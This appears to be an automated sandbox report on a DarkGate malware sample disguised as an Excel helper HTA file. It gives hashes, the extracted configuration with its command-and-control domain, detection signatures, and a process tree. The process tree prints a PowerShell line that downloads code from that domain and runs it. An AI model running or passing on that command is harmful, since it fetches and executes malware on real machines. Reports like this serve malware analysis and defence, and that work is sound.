Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
06-05-2024 18:57
Static task
static1
General
-
Target
MS_EXCEL_DOCUMENT_HELPER.hta
-
Size
2KB
-
MD5
af9e3d794e3f9caaabb93b84fb6ba798
-
SHA1
7aaa1e1e08ed260e9bff99576f66319aa7b05367
-
SHA256
bfad2a15e46ca4c593a5fa3d721942145ad7a76076d5db6aa835dc3813f7728e
-
SHA512
5bbecab1f7ca66b7f6620943bb9024fb88a0ce3ed95830af5515fb623e330d16ac967d44a8cc7121ddd9808c7b02476a90ce203de0c69f81f5c77b6378f6cb91
Malware Config
Extracted
darkgate
admin888
findyourbackups.com
-
anti_analysis
false
-
anti_debug
false
-
anti_vm
false
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
ljuGymXn
-
minimum_disk
100
-
minimum_ram
4096
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 4 IoCs
Processes:
resource yara_rule behavioral1/memory/1584-89-0x0000000004490000-0x000000000482A000-memory.dmp family_darkgate_v6 behavioral1/memory/1584-92-0x0000000004490000-0x000000000482A000-memory.dmp family_darkgate_v6 behavioral1/memory/1584-91-0x0000000004490000-0x000000000482A000-memory.dmp family_darkgate_v6 behavioral1/memory/1584-90-0x0000000004490000-0x000000000482A000-memory.dmp family_darkgate_v6 -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 2 1100 powershell.exe 3 1100 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
Autoit3.exepid process 1584 Autoit3.exe -
Command and Scripting Interpreter: AutoIT 1 TTPs 1 IoCs
Using AutoIT for possible automate script.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Autoit3.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Autoit3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Autoit3.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeAutoit3.exepid process 1100 powershell.exe 1100 powershell.exe 1584 Autoit3.exe 1584 Autoit3.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Autoit3.exepid process 1584 Autoit3.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1100 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
mshta.exepowershell.exedescription pid process target process PID 3884 wrote to memory of 1100 3884 mshta.exe powershell.exe PID 3884 wrote to memory of 1100 3884 mshta.exe powershell.exe PID 3884 wrote to memory of 1100 3884 mshta.exe powershell.exe PID 1100 wrote to memory of 1584 1100 powershell.exe Autoit3.exe PID 1100 wrote to memory of 1584 1100 powershell.exe Autoit3.exe PID 1100 wrote to memory of 1584 1100 powershell.exe Autoit3.exe PID 1100 wrote to memory of 4532 1100 powershell.exe attrib.exe PID 1100 wrote to memory of 4532 1100 powershell.exe attrib.exe PID 1100 wrote to memory of 4532 1100 powershell.exe attrib.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\MS_EXCEL_DOCUMENT_HELPER.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'findyourbackups.com/hwkayiuj')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\rlrh\Autoit3.exe"C:\rlrh\Autoit3.exe" script.a3x3⤵
- Executes dropped EXE
- Command and Scripting Interpreter: AutoIT
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:1584
-
-
C:\Windows\SysWOW64\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/rlrh/3⤵
- Views/modifies file attributes
PID:4532
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
498KB
MD520b223466a0fd0e9ac7b2bbedfa30bda
SHA1d3f2aef0e21cb9345d861a298d1175662a825a5d
SHA256a83d2c0c1d16b0f608c3082d20c498411ac7e4f9fc4f68a2c1a3c2c065d4b124
SHA512f7c4bd978a57e210fd31cf22f7a30d192ef714f61e972105b70e60b370ed20bfa1c1e03a88737980c9ab39955549a3325c5e16415d6ec9e971c7bdca2341a8f6